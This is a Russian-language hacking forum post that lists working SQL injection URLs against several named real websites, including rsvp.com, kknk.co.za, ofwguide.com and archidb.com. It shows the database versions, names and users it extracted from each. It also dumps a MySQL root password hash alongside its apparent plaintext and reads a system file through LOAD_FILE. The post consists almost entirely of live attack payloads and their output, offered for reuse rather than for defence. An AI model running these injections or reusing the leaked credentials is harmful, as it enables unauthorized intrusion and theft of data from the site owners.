|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
Еще рут -)
https://www.rsvp.com/item.php?item=68099809809+UNION+SELECT+AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database() ,0x2F2A2A2F,User(),0x3a),0x71),0x71),2,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29,30,31,32,33,34,35,36,37,38--
Database Version: 4.1.14-nt
Database name: rsvp
User name: root@localhost
https://www.rsvp.com/item.php?item=68099809809+UNION+SELECT+AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,password,0x2F2A2A2F,User, 0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+from+mysql.user--
root : 1c2e84cd19d4344c хэш MySQL : 1c2e84cd19d4344c : sli9Gnet
В базу с любых хостов под рутом -)
Читаем файло c:\boot.ini
Хех это я так отвлёкся....
https://www.rsvp.com/item.php?item=68099809809+UNION+SELECT+AES_DECRYPT (AES_ENCRYPT(CONCAT(0x3a,LOAD_FILE(0x633A2F626F6F7 42E696E69),0x3a),0x71),0x71),2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38--
http://www.kknk.co.za/cpage.php?id=89798698654+UNION+SELECT+1,AES_DECRYP T(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database( ),0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7,8,9,10,1 1--
Database Version: 4.1.12-standard-log
Database name: kknk_db1
User name: sandbn_16@www37.cpt1.host-h.net
http://www.ofwguide.com/article_item.php?articleid=7898798690689+union+sel ect+1,2,Concat_ws(0x3a,version(),database(),user() ),4--
Database Version: 4.1.22-standard
Database name: ofwguide_ofwguidedb
User name: ofwguide_abbie@localhost
http://www.archidb.com/archiinfo/3.asp?div_id=09&product_id=500+or+1=@@version--&company_id=49&det_id=09544
Microsoft SQL Server 2000 - 8.00.679 (Intel X86) Aug 26 2002 15:09:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4
Код HTML:
http://www.archidb.com/archiinfo/3.asp?div_id=09&product_id=500+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('DETAILS','BOARD','CATALOG','CATALOG_TEMP','CDCONT','COMPANY','COMPANY_REJECT','D99_Tmp','DET_CODE','DET_VIEW','DETAILS_TEMP','division','dtproperties','FREE','FREEBOARD','GRP_CODE','GRP_VIEW','h_NEWS','input_c','j_BOARD','jorye','NEWSBOARD','NOTICE','poll','poll_re','POSTNO','PRODUCTS','PRODUCTS_CHECK','PRODUCTS_REJECT','PRODUCTS_TEMP','PRODUCTS_TEMP_CHECK,'PRODUCTS_TEMP_CHECK'))--&compa
Последний раз редактировалось spherics; 31.01.2009 в 08:24..
|